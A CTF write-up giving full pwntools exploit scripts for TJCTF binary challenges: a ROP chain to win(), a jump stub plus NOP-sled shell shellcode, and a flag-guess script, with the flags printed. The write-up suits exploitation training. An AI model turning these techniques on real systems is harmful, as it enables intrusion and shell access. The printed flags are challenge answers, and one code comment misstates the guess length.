dplastico

Heap Challenge

By debugging and reading the source code, you can observe an attack path: changing the size to 0xa0 and then allocating the same size (with 0x98) prints the data 0x20 bytes after the chunk, which is where the flag should be. Flag: tjctf{bby-eap-lol171296386}, exploited manually with netcat.

Ring Opening

A simple ROP:

#!/usr/bin/python3
from pwn import *
# gdb script used when the exploit is launched with the GDB flag: break on
# main, then let the target run.
gs = '''
b main
continue
'''
# Terminal command pwntools uses to open the debugger window.
context.terminal = ['tmux', 'splitw', '-hp', '70']
# Load the target; assigning it to context.binary lets pwntools take the
# architecture/bitness from the ELF header.
elf = context.binary = ELF('./out')

def start():
    """Launch the target as selected by the pwntools command-line ``args``.

    GDB    -> run ``./out`` under gdb with the ``gs`` script.
    REMOTE -> connect to the challenge service instead of running locally.
    otherwise -> spawn ``./out`` as a local process.

    Returns the resulting pwntools tube.
    """
    if args.GDB:
        return gdb.debug('./out', gdbscript=gs)
    return remote('tjc.tf', 31457) if args.REMOTE else process('./out')
r = start()
r.timeout = 1
#========= exploit here ===================
# Resolved by the author but never referenced by the chain below.
libc = elf.libc

# Gadget addresses are fixed constants in this writeup; NOTE(review): that
# presumably relies on the binary being loaded at a fixed address.
poprdi = 0x0040117a   # named by the author as the pop-rdi gadget
ret = 0x401016        # 0x0000000000401016: ret (not used in the chain)

# Filler, then the gadget, the value it pops into rdi, then win().
chain = [
    b"A" * 0x10,
    p64(poprdi),
    p64(0xdeadbeef),
    p64(elf.sym.win),
]
payload = b"".join(chain)
r.sendline(payload)

#========= interactive ====================
r.interactive()

#tjctf{bby-rop-1823721665as87d86a5}

Sled

An easy jmp-and-shellcode challenge:

#!/usr/bin/python3
from pwn import *
# gdb script used when the exploit is launched with the GDB flag: break on
# main, then let the target run.
gs = '''
b main
continue
'''
# Terminal command pwntools uses to open the debugger window.
context.terminal = ['tmux', 'splitw', '-hp', '70']
# Load the target; assigning it to context.binary lets pwntools take the
# architecture/bitness from the ELF header.
elf = context.binary = ELF('./out')

def start():
    """Launch the target as selected by the pwntools command-line ``args``.

    GDB    -> run ``./out`` under gdb with the ``gs`` script.
    REMOTE -> connect to the challenge service instead of running locally.
    otherwise -> spawn ``./out`` as a local process.

    Returns the resulting pwntools tube.
    """
    if args.GDB:
        return gdb.debug('./out', gdbscript=gs)
    return remote('tjc.tf', 31456) if args.REMOTE else process('./out')
r = start()
#========= exploit here ===================
# First message: a two-instruction stub that transfers control to 0x401136.
stub = asm('''
    mov rdx, 0x401136
    call rdx
    ''')
# Printed so the author can see how large the stub assembled to.
print(hex(len(stub)))
r.sendline(stub)

# Second message: a 0x20-byte NOP sled in front of pwntools' stock shell
# shellcode.
sled = b"\x90" * 0x20
payload = sled + asm(shellcraft.sh())
r.sendline(payload)

#========= interactive ====================
r.interactive()
#tjctf{bby-shhEellLcodeeeeeaf7af7f66}

WtTwo

You can observe the flag in memory and just send it to print the flag remotely:

#!/usr/bin/python3
from pwn import *
# gdb script used when the exploit is launched with the GDB flag: break at
# main+430 (the offset the author chose), then let the target run.
gs = '''
b *main +430
continue
'''
# Terminal command pwntools uses to open the debugger window.
context.terminal = ['tmux', 'splitw', '-hp', '70']
# Load the target; assigning it to context.binary lets pwntools take the
# architecture/bitness from the ELF header.
elf = context.binary = ELF('./wttwo')

def start():
    """Launch the target as selected by the pwntools command-line ``args``.

    GDB    -> run ``./wttwo`` under gdb with the ``gs`` script.
    REMOTE -> connect to the service at 127.0.0.1:5555 instead of running
              the binary locally.
    otherwise -> spawn ``./wttwo`` as a local process.

    Returns the resulting pwntools tube.
    """
    if args.GDB:
        return gdb.debug('./wttwo', gdbscript=gs)
    return remote('127.0.0.1', 5555) if args.REMOTE else process('./wttwo')
r = start()
#========= exploit here ===================

# The guess the author read out of memory, sent as a single line.  The
# original built it one byte at a time; this is the same 30-byte value.
payload = b"tjctf{wt-the-twooooooas48%@dfs}"
# Right-pad with "A" up to 30 bytes (a no-op when the guess is already
# 30 bytes or longer, exactly like the original length arithmetic).
payload = payload.ljust(30, b"A")
print(payload)
r.sendlineafter(b"Guess my flag!!", payload)

#========= interactive ====================
r.interactive()